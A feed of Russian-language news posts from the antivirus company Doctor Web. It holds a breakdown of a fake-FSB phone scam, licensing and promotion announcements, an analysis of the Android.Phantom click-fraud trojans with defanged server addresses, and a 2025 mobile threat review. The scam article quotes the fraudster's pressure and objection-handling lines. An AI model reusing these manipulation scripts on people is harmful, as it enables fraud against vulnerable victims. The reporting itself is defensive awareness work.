Все новости

«У вас произошла утечка персональных данных!». Анатомия мошеннического звонка

Mon, 09 Feb 2026 11:35:33 GMT

Телефонное мошенничество остается насущной проблемой нашего общества, несмотря на постоянное противодействие со стороны государства, банков и операторов связи. Никто не застрахован от обмана: в ловушку преступников может попасть как ребенок или пенсионер, так и искушенный взрослый.

Чтобы детально разобрать мошенническую схему и предостеречь других потенциальных жертв, сотрудница «Доктор Веб» «прошла» весь путь от первого звонка до финальной попытки выманить деньги. Это была сложносоставная комбинация с применением различных методов социальной инженерии.

Этап 1. Давление авторитетом

Мошенники атаковали коллектив компании «Доктор Веб» еще с декабря 2024 года. Они выходили на разных сотрудников с одним и тем же заходом: произошла утечка конфиденциальных данных, началось расследование, с вами свяжется куратор из ФСБ. Коммуникация всегда велась якобы от лица генерального директора или другого представителя руководящего звена компании. Поскольку данный подход не привел к желаемым результатам, преступники сменили тактику и сфокусировались на пожилых сотрудниках.

Пенсионеры — наиболее привлекательная для мошенников группа населения. Они более доверчивы, меньше разбираются в современных технологиях и имеют сформировавшееся уважение к представителям власти. Кроме того, пенсионеры уже не работают в компании (по крайней мере, именно так считают мошенники), поэтому хуже разбираются в том, кто текущий руководитель, как он разговаривает, что у него за характер.

Утром на телефон нашей сотрудницы, для краткости назовем ее N, поступил звонок через Телеграм. Звонящий представился генеральным директором «Доктор Веб», что подтверждалось его реальными фото и именем/фамилией. Но его аккаунт был создан менее суток назад, номер телефона скрыт, а голос и манера общения резко отличались от привычных. Злоумышленник ввел N в контекст произошедшей ситуации. Якобы произошла утечка персональных данных внутри компании. Для расследования инцидента создана специальная комиссия. Составлен список лиц, которые обязаны дать показания о случившемся. N также внесена в этот перечень, поэтому в течение дня ей позвонит сотрудник ФСБ. Планируемые каналы связи: мессенджер MAX или Телеграм. Если не получится связаться с N через них, поступит обычный звонок на мобильный номер. И поскольку скомпрометированы в том числе личные данные самой N, ей следует с полной серьезностью отнестись к разговору.

Примечателен факт, что мошенники всегда действуют под маской вышестоящего руководителя, пытаясь задавить авторитетом. Но зачастую это прикрытие и выдает их: они не знают внутренних взаимоотношений, корпоративной культуры, порядка принятия решений внутри компании, что раскрывает их ложь. Поэтому и стали атаковать пенсионеров!

Самым примечательным моментом данного этапа стало использование мессенджеров. Сотрудники правоохранительных органов всегда звонят напрямую на телефонный номер. Звонки через Телеграм или MAX — это коммуникация через интернет, что не предусмотрено для силовых ведомств.

Этап 2. Демонстрация легитимности

Далее в игру вступает «представитель ФСБ» — майор, старший следователь по особо важным делам. Он звонит N через Телеграм, но разговор не получается из-за отсутствия соединения. Лжемайор присылает сообщение, в котором представляется и прикрепляет фото своего удостоверения.

Подобные фотографии рассчитаны на доверчивых и невнимательных людей или тех, кто никогда не имел взаимоотношений с силовыми ведомствами:

фотография удостоверения на столе ничего не доказывает — мы не видим лица автора съемки, оно может не совпадать с фото в документе,
удостоверение предъявляют только при личном контакте, а не посылают через интернет,
сотрудники «Доктор Веб» за несколько минут нашли в открытом доступе шаблоны подобных документов, куда с помощью ИИ можно вставить любое ФИО и фото. Получившиеся изображения неотличимы от подлинных фотографий.

Поскольку дозвониться через Телеграм не получилось, лжемайор предлагает продолжить общение в национальном мессенджере МАХ, который позиционируется как безопасный. Вот только он не может найти N в мессенджере и предлагает ей самой прислать приглашение для запуска чата. Но даже после этого у мошенника не получается дозвониться, так как у N стоит ограничение — звонки только от абонентов из списка контактов. Поэтому он предлагает N самостоятельно позвонить в чате. Эти манипуляции необходимы для создания иллюзии достоверности и укрепления атмосферы доверия, ведь слишком быстрый и простой контакт может навести на подозрения. В итоге связь была установлена и разговор продолжился в течение часа.

Этот небольшой, но важный эпизод показывает, что введенные не так давно ограничения средств связи не работают так, как было задумано. Злоумышленники используют социальную инженерию, чтобы заставить жертв звонить им самостоятельно — без разницы где. Не стоит вопрос безопасности и защищенности MAX или Телеграм, поскольку тот или другой мессенджер выступают просто в роли инструмента связи. Статистика утверждает, что количество мошеннических звонков снизилось — но взамен выросло их качество. Преступники перестали практиковать массовые обзвоны и сосредоточились на точечных операциях.

Мы не будем подробно пересказывать все перипетии беседы, остановимся на нескольких моментах, важных для понимания техники обмана. Прежде всего лжемайор пытался убедить N в подлинности своей личности. Он предложил зайти на официальный сайт Федеральной службы безопасности, перейти в раздел «Справочная информация», затем выбрать конкретный округ Москвы, посмотреть контактный номер подразделения и своими глазами убедиться, что контакт в Телеграме совпадает. Цифры действительно были те же, вот только в профиле контакта этот телефонный номер указан в строке «Имя». А в самом мессенджере MAX контакт мошенника зарегистрирован со скрытым номером.

Этап 3. Эскалация и прессинг

Лжемайор настаивал и даже требовал соблюдения строгой конфиденциальности во время беседы и после нее. Он несколько раз заострил внимание, что собеседница должна находиться в комнате одна и никто не имеет права помешать разговору — даже члены семьи. Для большего эффекта были названы имена домочадцев N. Далее по ходу разговора притворяющийся майором несколько раз переспрашивал, одна ли N в комнате, и подчеркивал необходимость соблюдения строжайшей секретности.

По мере развития беседы раскручивалась мошенническая легенда, параллельно с усилением напряжения. Злоумышленник подтвердил слова первого звонившего о том, что произошла утечка персональных данных и силовое ведомство подозревает кого-то из руководителей компании или HR-специалистов. Росфинмониторингом была пресечена попытка крупного денежного перевода от лица N на нужды ВСУ. Приведем небольшой отрывок, чтобы продемонстрировать отработку возражений:

N: Простите, но тут какая-то ошибка. Я не держу такие большие суммы на счетах, поэтому их просто физически невозможно перевести куда-либо.
Лжемайор: Попытка перевода могла быть совершена и с кредитного счета, не обязательно депозит.
N: Возможно, но я специально для таких случаев оформила самозапрет на оформление кредитов.
Лжемайор: К сожалению, самозапрет на дает 100% гарантии. Некоторые нечистоплотные сотрудники коммерческих банков могут игнорировать предписания ради собственной выгоды. Учтите, если мы зафиксируем очередную попытку перевода, вы будете главной подозреваемой. Придется возбуждать дело и разбираться.

Наша сотрудница была готова к подобному повороту событий, но, как правило, такого рода обвинения производят ошеломляющий эффект. Речь идет не о рядовой краже — об измене Родине. Для людей пожилого возраста это чудовищное преступление. После таких слов сложно сохранить присутствие духа, рассуждать логично, сосредоточиться на несостыковках. Ситуацию усугубляет осознание того, что жертве предъявляют обвинения, которые практически невозможно опровергнуть: кто-то где-то на стороне воспользовался персональными данными, но главный подозреваемый — вы!

Для усиления психологического давления, лжемайор присылал изображения разных документов: письмо из Росфинмониторинга в ФСБ с просьбой об инициировании расследования и повестка о вызове в качестве подозреваемого. Наши юристы внимательно изучили их и выделили детали, указывающие на фальшивое происхождение. Мы приводим только некоторые из них, так как детальный публичный разбор ошибок в фальшивых документах потенциально вооружает преступников:

повестки не направляются через мессенджеры, об этом неоднократно заявляли представители правоохранительных органов;
текст повестки краток и не содержит разъясняющих и угрожающих формулировок;
согласно ст. 188 УПК РФ «Порядок вызова на допрос» повесткой на допрос может быть вызван только свидетель или потерпевший. Подозреваемого задерживают, согласно ст. 92 УПК РФ «Порядок задержания подозреваемого». Такой документ, как «Повестка о вызове подозреваемого на допрос» не может существовать согласно юридическим нормам.

Люди не в состоянии обращать внимание на подобные нюансы, оказавшись под давлением. 

Этап 4. Кульминация комбинации

Переходим к главному пункту мошенничества, ради которого затевалась комбинация. Лжемайор перечислил N банки, где находятся ее счета: Сбер, Альфа, Озон и ОТП-банк. Последний — некая венгерская кредитная организация, через которую будто бы совершаются переводы на Украину. Заботливый лжемайор высказал пожелание предотвратить возможное преступление и защитить N от карающей длани Фемиды. Для этого он передаст заявку в ЦБ, откуда с потенциальной жертвой свяжется сотрудник и поможет «все правильно сделать» (предположительно, перевести деньги на безопасный счет).

К этому моменту N уже определила основные черты схемы и решила прервать общение. Но злоумышленник не хотел отпускать добычу. Прикрываясь статьей 205.6 УК РФ «Несообщение о преступлении», он заявил, что ему бы очень не хотелось, чтобы N потом пыталась связаться с ним, обрывая его телефон с просьбой помочь. Но поскольку N отказалась от сотрудничества, лжемайор уведомил, что вынужден обратиться к регулятору для блокировки счетов и наложения ареста на имущество, в том числе ближайших родственников, а далее прислать повестку. На этом общение с лжемайором завершилось.

Этап 5. Провоцирование повторного контакта

Поскольку мошенники не добились своей главной цели, они попытались спровоцировать N саму связаться с ними. Буквально через несколько минут героине позвонили из Сбера и попросили подтвердить подачу заявки на блокировку карты. После отрицательного ответа карта заблокирована не была.

В свою очередь, Альфа-банк прислал несколько СМС о блокировке каждой из карт. Для решения проблемы N пришлось позвонить на горячую линию и сделать запрос об отмене. Как оказалось, одна из соучастниц мошенничества ранее также позвонила на горячую линию и представилась N. Назвав полностью ФИО, а также дату рождения, преступница попросила заблокировать карты. Для сотрудника банка этих данных оказалось достаточно.

Выводы

Инцидент не стал удачным для мошенников благодаря принятым предупредительным мерам в «Доктор Веб». Атаки активно происходили в течение всего 2025 года, поэтому все сотрудники компании были неоднократно проинструктированы и имели четкие внутренние регламенты, как действовать в подобных случаях.

Сотрудница N, будучи опытным и высококвалифицированным специалистом, провела диалог с мошенниками не спонтанно, а осознанно и хладнокровно, следуя внутренним инструкциям. Именно они не позволили эмоциям взять верх над логикой и вниманием к деталям. Контакт помог собрать ценную информацию без какого-либо риска или ущерба, превратив потенциальную угрозу в детальный разбор мошеннической схемы.

Таким образом, устойчивость к мошенничеству строится на:

четких корпоративных правилах, дающих сотрудникам однозначный алгоритм действий,
постоянном обучении и регулярном повышении осведомленности, превращающих каждого сотрудника в осознанного участника системы безопасности.

Именно подобный комплексный и системный подход, в отличие от технических блокировок, создает настоящий щит, способный противостоять социальной инженерии, и вселяет в сотрудников уверенность в своей правоте. Мы хотим обратить особое внимание руководителей организаций, что именно от их активной роли зависит, насколько весь коллектив будет готов к подобным атакам и манипуляциям.

Прекращена продажа решений Dr.Web по подписке через ПАО «Ростелеком»

Fri, 06 Feb 2026 17:21:38 GMT

Компания «Доктор Веб» информирует, что с 6 февраля 2026 года прекращена продажа новых лицензий и продление действующих подписок через ПАО «Ростелеком».

Что необходимо знать пользователям:

Ваши устройства все еще под защитой Dr.Web. Антивирус полноценно функционирует до последнего дня действия лицензии. Мы гарантируем бесперебойную работу, полную техническую поддержку, своевременное обновление антивирусных баз и всех компонентов программы.
Для продолжения защиты вам необходимо приобрести новую лицензию в нашем официальном интернет-магазине после окончания срока действия вашей текущей лицензии от ПАО «Ростелеком».

Чтобы сделать переход на прямое обслуживание «Доктор Веб» плавным, простым и выгодным, мы подготовили специальное предложение для абонентов ПАО «Ростелеком»: дополнительные 30 дней защиты в подарок.

Чтобы им воспользоваться, нужно сделать следующее:

После окончания действия лицензии удалите текущую версию антивируса Dr.Web, установленную через ПАО «Ростелеком».
Оформите новую подписку на официальном сайте «Доктор Веб», используя промокод АНТИВИРУС. Он дает право при покупке подписки Dr.Web Персональный, Мобильный или Расширенный на 30 дней на любое количество устройств получить дополнительно еще 30 дней в подарок. Таким образом, вы заплатите за 30 дней, а подписка продлится 60.
Скачайте дистрибутив с нашего сайта и установите его.

Получить дополнительную информацию о предложении или задать вопросы о переходе можно специалистам Службы поддержки продаж «Доктор Веб».

Получены сертификаты соответствия ФСБ России на продукты Dr.Web Desktop Security Suite, Dr.Web Server Security Suite и Dr.Web Enterprise Security Suite

Mon, 02 Feb 2026 13:19:07 GMT

Компания «Доктор Веб» сообщает, что получены новые сертификаты соответствия ФСБ России на программные продукты Dr.Web Desktop Security Suite, Dr.Web Server Security Suite и Dr.Web Enterprise Security Suite.

Рекомендуем пользователям обновить свое ПО до новой сертифицированной версии.

Подробнее о продуктах

Dr.Web Desktop Security Suite для ОС Windows:

версия 12.0.8,
сертификат соответствия № СФ/СЗИ-0844,
срок действия: 05.12.2025 — 31.10.2030,
средство антивирусной защиты Классов В2 и Г2 в соответствии с документом «Требования к программным антивирусным средствам, используемым в средствах вычислительной техники, эксплуатируемых в органах федеральной службы безопасности»,
продукт предназначен для защиты информации в информационных системах, в том числе в государственных информационных системах, в которых обрабатывается информация как конфиденциального характера, так и содержащая совершенно секретные сведения.

Dr.Web Server Security Suite для ОС Windows:

версия 12.0.8,
сертификат соответствия № СФ/СЗИ-0843,
срок действия: 05.12.2025 — 31.10.2030,
средство антивирусной защиты Класса Б2 в соответствии с документом «Требования к программным антивирусным средствам, используемым в средствах вычислительной техники, эксплуатируемых в органах федеральной службы безопасности»,
продукт предназначен для защиты информации в информационных системах, в том числе в государственных информационных системах, в которых обрабатывается информация как конфиденциального характера, так и содержащая совершенно секретные сведения.

Dr.Web Enterprise Security Suite:

версия 13,
сертификат соответствия № СФ/СЗИ-0873,
срок действия: 29.01.2026 — 29.01.2031,
средство антивирусной защиты Классов А2, Б2, В2 и Г2 в соответствии с документом «Требования к программным антивирусным средствам, используемым в средствах вычислительной техники, эксплуатируемых в органах федеральной службы безопасности»,
продукт применяется для защиты информации в информационных системах, в том числе в государственных информационных системах, в которых обрабатывается информация как конфиденциального характера, так и содержащая совершенно секретные сведения,
решение предназначено для организации и управления единой и надежной комплексной антивирусной защитой внутренней сети компании, включая мобильные устройства.

Напоминаем, что поставки лицензий на сертифицированные продукты Dr.Web сопровождаются полным комплектом сертификационных материалов.

По вопросам обновления ПО или приобретения продуктов Dr.Web обращайтесь к партнерам или к специалистам Службы поддержки продаж «Доктор Веб».

Акция для бизнеса и государственных учреждений: переход на Dr.Web со скидкой 50%

Fri, 30 Jan 2026 11:50:53 GMT

С 1 февраля 2026 года компания «Доктор Веб» запускает акцию для бизнеса и государственных учреждений — скидка 50% при переходе на решения Dr.Web с антивирусов других производителей.

Акция действует до 31 декабря 2026 года включительно и распространяется на продукты Dr.Web для бизнеса и госучреждений:

Dr.Web Desktop Security Suite — защита рабочих станций,
Dr.Web Server Security Suite — защита серверов,
Dr.Web Mobile Security Suite — защита мобильных устройств и планшетов,
Dr.Web Mail Security Suite — проверка почтового трафика,
Dr.Web Gateway Security Suite — проверка интернет-трафика,
Dr.Web ATM Shield — защита встроенных устройств,
Комплект для малого бизнеса — оптимальное решение для малого бизнеса.

Предложение адресовано организациям, которые:

Планируют переход на ПО Dr.Web
Ранее не использовали продукты Dr.Web для бизнеса и госучреждений, но планируют переход с решений других вендоров.
Ранее использовали ПО Dr.Web
Использовали решения Dr.Web в прошлом, но не приобретали лицензии со скидкой по программе миграции «Переходи на зеленый» на соответствующие продукты.
Планируют расширение лицензии
Используют Dr.Web Desktop Security Suite для защиты от 1 до 5 рабочих станций и готовы в рамках акции увеличить лицензию от 50 до 250 рабочих станций или приобрести другие продукты Dr.Web в соответствии с условиями акции.

Общие условия:

Организация должна иметь действующую или истекшую не более 30 дней назад лицензию другого производителя на аналогичные защищаемые объекты.
Акция не применяется, если организация ранее уже приобретала желаемый продукт по программе миграции «Переходи на зеленый».
Скидка предоставляется на одно-, двух- или трехлетние лицензии в рамках действующего прайс-листа.
Скидка не суммируется с другими акционными предложениями.

Как воспользоваться акцией

Для участия в Акции обратитесь к партнерам «Доктор Веб» либо воспользуйтесь сервисом «Конструктор лицензий для бизнеса и госучреждений».
Дополнительную информацию можно получить у партнеров или у специалистов Службы поддержки продаж «Доктор Веб».

Трояны семейства Android.Phantom проникают в смартфоны вместе с играми и пиратскими модами популярных приложений. Они используют машинное обучение и видеотрансляции для накрутки кликов

Wed, 21 Jan 2026 05:00:00 GMT

21 января 2026 года

Специалисты антивирусной лаборатории «Доктор Веб» обнаружили и исследовали новое семейство троянов с функциональностью кликера. Их объединяет одна особенность: они либо управляются с сервера hxxps[:]//dllpgd[.]click, либо загружаются и выполняются по команде с него. Вредоносное ПО данного типа заражает смартфоны на ОС Android.

Один из каналов распространения троянов — официальный каталог приложений для устройств Xiaomi GetApps.

Нам удалось отследить несколько мобильных игр, которые содержат вредоносное ПО: Creation Magic World (более 32 тыс. скачиваний), Cute Pet House (>34 тыс. скачиваний), Amazing Unicorn Party (>13 тыс. скачиваний), Академия мечты Сакура (>4 тыс. скачиваний), Theft Auto Mafia (>61 тыс. скачиваний), Open World Gangsters (>11 тыс. скачиваний). Все зараженные игры выложены от лица одного разработчика, SHENZHEN RUIREN NETWORK CO., LTD., троянцы вшиты в них и запускаются вместе с приложениями.

В первоначальных версиях игр вредоносного ПО не было. 28/29 сентября разработчик публикует обновления для игр, в которые встроен троян Android.Phantom.2.origin. Он работает в двух режимах, которые в коде программы условно называются режим сигнализации (signaling) и фантом (phantom).

В режиме phantom вредоносное ПО использует скрытый от пользователя встроенный браузер на основе виджета WebView. В него по команде с сервера hxxps[:]//playstations[.]click загружается целевой сайт для накрутки кликов и файл JavaScript «phantom». Последний содержит в себе сценарий для автоматизации действий на рекламных объявлениях загруженного сайта и фреймворк машинного обучения TensorFlowJS. Модель для этого фреймворка загружается с сервера hxxps[:]//app-download[.]cn-wlcb[.]ufileos[.]com в директорию приложения. В сценариях для работы с некоторыми видами рекламы Android.Phantom.2.origin размещает браузер на виртуальном экране и делает скриншоты. Троян анализирует их с помощью модели для фреймворка TensorFlowJS, а затем кликает по обнаруженным элементам.

В альтернативном режиме signaling троянец подключается к стороннему серверу при помощи WebRTC. Эта технология позволяет браузерам и приложениям устанавливать прямое соединение для обмена данными, аудио и видео в режиме реального времени без установки дополнительного ПО. В режиме signaling уже упомянутый hxxps[:]//dllpgd[.]click выполняет роль сигнального сервера, устанавливающий соединения между узлами WebRTC. Также данный сервер определяет режим работы трояна, phantom или signaling. Задачи с целевыми сайтами приходят от hxxps[:]//playstations[.]click. Далее Android.Phantom.2.origin тайно от пользователя транслирует злоумышленникам видео виртуального экрана с загруженным в браузер сайтом. Троянец дает возможность подключенному узлу WebRTC удаленно управлять браузером на виртуальном экране: кликать, скроллить, вводить или вставлять текст в форму для ввода.

15/16 октября вышеуказанные игры получили еще одно обновление. В дополнение к Android.Phantom.2.origin в них встроили модуль Android.Phantom.5. Он является дроппером, который содержит внутри себя загрузчик удаленного кода Android.Phantom.4.origin. Эта программа загружает еще несколько троянов, предназначенных для имитации кликов на различных сайтах. Эти модули проще кликера Android.Phantom.2.origin — они не используют машинное обучение или видеотрансляции, а руководствуются сценариями для кликов, написанных на JavaScript.

Чтобы использовать технологию WebRTC на Android, трояну необходимо подключить специальную библиотеку с Java API, которая не входит в состав стандартной ОС и скачанных приложений. Поэтому поначалу троян работал преимущественно в режиме phantom. С добавлением в приложения Android.Phantom.5, троян Android.Phantom.2.origin получил возможность использовать загрузчик удаленного кода Android.Phantom.4.origin для загрузки необходимой библиотеки.

Злоумышленники используют также и другие каналы распространения троянов Android.Phantom.2.origin и Android.Phantom.5. К примеру, моды музыкального стриминга Spotify с разблокированными premium функциями. Они размещаются на различных сайтах, вот несколько примеров:

Сайт Spotify Plus

Сайт Spotify Pro

И в специальных телеграм-каналах:

Spotify Pro
(54 400 подписчиков)

Spotify Plus – Official
(15 057 подписчиков)

Моды Spotify, размещенные на сайтах и в указанных на скриншотах телеграм-каналах, содержат Android.Phantom.2.origin и библиотеку для организации связи по стандарту WebRTC под Android.

Кроме модов Spotify, злоумышленники вшивают трояны в моды других популярных приложений: YouTube, Deezer, Netflix и др. Они размещены на специальных сайтах с модами:

Сайт Apkmody

Сайт Moddroid

Сайт Moddroid содержит раздел «Выбор редакции». Из 20 приложений в нем только 4 были чистыми. Остальные 16 содержали трояны семейства Android.Phantom. Приложения на этих двух сайтах загружаются с одного CDN-сервера hxxps[:]//cdn[.]topmongo[.]com. У этих сайтов есть свои телеграм-каналы, где пользователи скачивают зараженные троянам моды:

Moddroid.com
(87 653 подписчика)

Apkmody Chat
(6 297 подписчиков)

Также для своих целей преступники используют сервера Discord. Самый большой из них — Spotify X, около 24 тысяч подписчиков.

Администраторы Discord-серверов не стесняются напрямую предлагать зараженные моды. Например, на скриншоте выше администратор от лица сервера предлагает скачать мод музыкального стриминга Deezer вместо Spotify, поскольку последний перестал работать.

По ссылке скачивается рабочий мод. Его код защищен коммерческим упаковщиком, внутри которого скрывается троян Android.Phantom.1.origin. Это загрузчик удаленного кода, по команде с сервера hxxps[:]//dllpgd[.]click он загружает уже нам знакомые Android.Phantom.2.origin, Android.Phantom.5 и троян-шпион Android.Phantom.5.origin. Последний отправляет информацию об устройстве злоумышленникам, в том числе номер телефона, геолокацию, список установленных приложений.

Этот скриншот с сервера показывает, на каких языках говорят пользователи, которые становятся объектами заражения. Для доступа к чатам на языках, отличных от английского, необходимо поставить реакцию с соответствующим флагом. Больше всего отметились пользователи, говорящие на испанском, французском, немецком, польском и итальянском языках (не считая английского, который является основным языком сервера). Также администраторы сервера не предусмотрели чатов для многих стран Азии.

Трояны могут нанести существенный вред владельцам зараженных устройств. Перечислим несколько возможных исходов:

Невольное соучастие. Смартфон пользователя может быть использован в качестве бота при DDoS-атаке, тем самым делая владельца невольным соучастником киберпреступления.
Незаконная активность. Через устройство злоумышленники могут совершать незаконную онлайн-деятельность, к примеру, использовать смартфон в мошеннических схемах или рассылать спам-сообщения.
Повышенное потребление заряда и трафика. Посторонняя деятельность разряжает аккумулятор и расходует интернет-трафик.
Утечка персональных данных. Android.Phantom.5.origin является шпионом и может передавать данные об устройстве и владельце.

Трояны этого семейства представляют угрозу для владельцев мобильных устройств на Android, не защищенных актуальным антивирусным ПО. Российские пользователи испытывают трудности с регистрацией в зарубежных приложениях или оплатой подписок. Ситуация подталкивает искать и использовать альтернативные, зачастую полулегальные, способы получения услуг этих компаний. Эта ситуация на руку вирусописателям, ведь пользователям приходится рисковать и доверять сомнительным вариантам. Особую группу риска составляют дети, которые не думают о правилах цифровой гигиены, желая всего лишь поиграть, послушать музыку или посмотреть видеоклипы.

Мы рекомендуем не скачивать моды на сомнительных сайтах и в каналах. Как правило, проверка источников модов или приложений требует времени, опыта и насмотренности. Поэтому лучший вариант обеспечить себе и своим близким гарантированное спокойствие — использовать Dr.Web Security Space для мобильных устройств. Он защитит не только ваши смартфоны, но и другие умные устройства: игровые консоли, планшеты, smartTV.

Индикаторы компрометации
Подробнее о Android.Phantom.1.origin
Подробнее о Android.Phantom.2.origin
Подробнее о Android.Phantom.3
Подробнее о Android.Phantom.4.origin
Подробнее о Android.Phantom.5
Подробнее о Android.Phantom.5.origin

«Доктор Веб»: обзор вирусной активности для мобильных устройств за 2025 год

Thu, 15 Jan 2026 00:00:00 GMT

Скачать PDF

15 января 2026 года

Главное

В 2025 году пользователи Android-устройств чаще всего сталкивались с рекламными троянами, а также с программами-подделками, которые используются в мошеннических целях.

Самым распространенным нежелательным ПО, как и годом ранее, стали приложения, в игровой форме предлагающие выполнять те или иные задания и получать за это виртуальные награды. Они обещают возможность конвертировать вознаграждение в настоящие деньги, но на самом деле такой возможности в программах не предусмотрено.

Среди потенциально опасного ПО наибольшая активность наблюдалась со стороны приложений, которые были модифицированы при помощи утилиты NP Manager. Она обфусцирует и защищает код модифицируемых программ от анализа и обнаружения, а также позволяет обходить проверку цифровой подписи после их изменения. Наиболее часто детектируемыми рекламными программами стали неофициальные модификации мессенджера WhatsApp, которые автоматически открывают рекламные ссылки при работе с приложением.

В минувшем году были зафиксированы новые случаи внедрения вредоносных программ в прошивку различных моделей Android-устройств. Об одном из них мы рассказали весной 2025 года. Киберпреступникам удалось предустановить троян Android.Clipper.31 на несколько бюджетных моделей смартфонов и с его помощью похищать криптовалюту жертв.

Также весной наши специалисты обнаружили троянскую программу Android.Spy.1292.origin, которую вирусописатели встроили в одну из модифицированных версий картографического ПО Alpine Quest. Вредоносное приложение было нацелено на российских военнослужащих и применялось в целях кибершпионажа.

В конце лета антивирусная лаборатория «Доктор Веб» проинформировала о бэкдоре Android.Backdoor.916.origin, который распространялся через популярные мессенджеры. Злоумышленники использовали его для слежки за сотрудниками российских компаний и сбора их конфиденциальной информации.

А уже осенью мы рассказали об опасном бэкдоре Android.Backdoor.Baohuo.1.origin, которого киберпреступники встроили в модификации мессенджера Telegram X. Эта вредоносная программа позволяла взламывать учетные записи Telegram жертв и управлять самим мессенджером от имени пользователей.

За минувшие 12 месяцев антивирусная лаборатория «Доктор Веб» выявила в каталоге Google Play более 180 угроз, которые в общей сложности были загружены свыше 2 165 000 раз. Среди них были различные варианты троянов, подписывающих пользователей на платные услуги, программы-подделки, которые применяются в мошеннических целях, а также новое рекламное и нежелательное ПО.

В 2025 году вирусописатели продолжили использовать различные техники, направленные на усложнение анализа вредоносных Android-программ и обхода их детектирования антивирусами. Одним из популярных методов было конвертирование DEX-кода в C-код. Кроме того, наши вирусные аналитики отметили, что при создании вредоносного ПО злоумышленники применяют ИИ-ассистентов, которые помогают писать код.

Тенденции прошедшего года

Рекламные трояны вновь стали наиболее распространенными Android-угрозами
Выросла популярность утилиты NP Manager, которая обфусцирует код модифицируемых Android-приложений и позволяет обходить проверку их цифровой подписи после модификации
Возросла активность банковских троянов
Выявлены новые случаи заражения прошивок Android-устройств
Киберпреступники продолжили использовать как уже известные техники для защиты вредоносных программ от детектирования и анализа, так и новые приемы
Вирусописатели активно применяли ИИ-помощников для написания кода вредоносных приложений
Появление новых угроз в каталоге Google Play

Наиболее интересные события 2025 года

В апреле минувшего года эксперты «Доктор Веб» выявили масштабную кампанию по краже криптовалют у владельцев Android-устройств. Злоумышленники получили доступ к цепочке поставок ряда китайских производителей и внедрили в прошивку нескольких бюджетных моделей смартфонов троянскую программу Android.Clipper.31. Вирусописатели встроили ее в модифицированную версию мессенджера WhatsApp. Для модификации использовался инструмент LSPatch, позволяющий менять логику работы приложений без изменения их кода.

Android.Clipper.31 перехватывает отправляемые и принимаемые в мессенджере сообщения, ищет в них адреса криптокошельков Tron и Ethereum и заменяет их адресами, которые принадлежат атакующим. При этом троян скрывает подмену, и в таких сообщениях жертвам демонстрируются корректные кошельки. Android.Clipper.31 также отправляет злоумышленникам все изображения в формате jpg, png и jpeg для поиска в них сохраненных мнемонических фраз, позволяющих получить доступ к криптокошелькам. Киберпреступники встроили Android.Clipper.31 и в десятки других программ, среди которых были популярные приложения криптокошельков, сканеры QR-кодов и прочие мессенджеры, в том числе — Telegram. Эти модификации распространялись через вредоносные сайты.

В 2025 году отмечались и другие случаи проникновения вредоносных программ в системную область Android-устройств. Например, еще одной группе злоумышленников удалось внедрить новые версии опасных троянов Android.Triada в прошивку ряда бюджетных смартфонов. Вредоносные программы Triada опасны тем, что способны заражать системный процесс Zygote. Тот непосредственно участвует в запуске всех приложений в системе, поэтому и трояны Triada в дальнейшем могут внедряться в любое приложение на устройстве, фактически получая над ним полный контроль. Злоумышленники используют этих троянов для загрузки и установки других вредоносных программ, а также нежелательных и рекламных приложений. Кроме того, с их помощью они могут шпионить за жертвами, подписывать их на платные услуги и т. д. Также были выявлены новые случаи заражения прошивок TV-приставок на базе Android новыми версиями трояна Android.Vo1d, которого наша компания обнаружила в 2024 году. Vo1d представляет собой бэкдор, который помещает свои компоненты в системную область зараженных устройств и по команде атакующих способен скрытно скачивать и устанавливать стороннее ПО.

Также в апреле наша антивирусная лаборатория зафиксировала кампанию по распространению трояна-шпиона Android.Spy.1292.origin, нацеленного на российских военнослужащих. Злоумышленники встроили вредоносную программу в одну из версий картографического ПО Alpine Quest и распространяли модификацию через созданный ими Telegram-канал, который выдавали за официальный, а также через один из российских каталогов Android-приложений.

Telegram-канал, через который злоумышленники распространяли вредоносную модификацию Alpine Quest, содержащую Android.Spy.1292.origin

Android.Spy.1292.origin передавал киберпреступникам данные об учетных записях и номере мобильного телефона, контакты из телефонной книги, геолокацию устройства и сведения о хранящихся на нем файлах. Троян мог похищать определенные файлы по команде атакующих. Тех интересовали конфиденциальные документы, которые пользователи отправляли через популярные мессенджеры, а также файл журнала локаций приложения Alpine Quest.

В августе мы рассказали о случаях распространения бэкдора Android.Backdoor.916.origin через личные сообщения в популярных мессенджерах. Атакующие предлагали потенциальным жертвам установить «антивирус» из прикрепленного к сообщениям APK-файла, в котором на самом деле и скрывалась вредоносная программа. Наша антивирусная лаборатория обнаружила первые версии Android.Backdoor.916.origin в январе 2025 года и с момента обнаружения отслеживала его активность, что и позволило оперативно выявить данную кампанию.

Android.Backdoor.916.origin вводит пользователей в заблуждение, имитируя работу антивируса

После установки на Android-устройство Android.Backdoor.916.origin позволяет похищать конфиденциальную информацию и следить за пользователем. Например, с помощью бэкдора злоумышленники могут прослушивать разговоры, передавать трансляцию с камеры, отслеживать местоположение и красть содержимое из мессенджеров и браузеров. Кроме того, Android.Backdoor.916.origin реализует функциональность кейлоггера для перехвата вводимого текста, в том числе — паролей. По оценкам наших специалистов, бэкдор применяется в таргетированных атаках и не предназначен для массового распространения. Основной целью для киберпреступников являются сотрудники российских компаний.

В октябре «Доктор Веб» опубликовал сведения о многофункциональном бэкдоре Android.Backdoor.Baohuo.1.origin, который наши вирусные аналитики обнаружили в модифицированных версиях мессенджера Telegram X. Основным источником его распространения стали вредоносные сайты, куда потенциальные жертвы попадают через рекламу в мобильных приложениях. На этих сайтах пользователям предлагается установить Telegram X — якобы для поиска партнера для общения и свиданий. При этом такие интернет-ресурсы в большей степени ориентированы на жителей Индонезии и Бразилии. В то же время мы выявили этот бэкдор и в ряде сторонних каталогов Android-приложений.

Пример вредоносного сайта, с которого загружалась троянская версия Telegram X

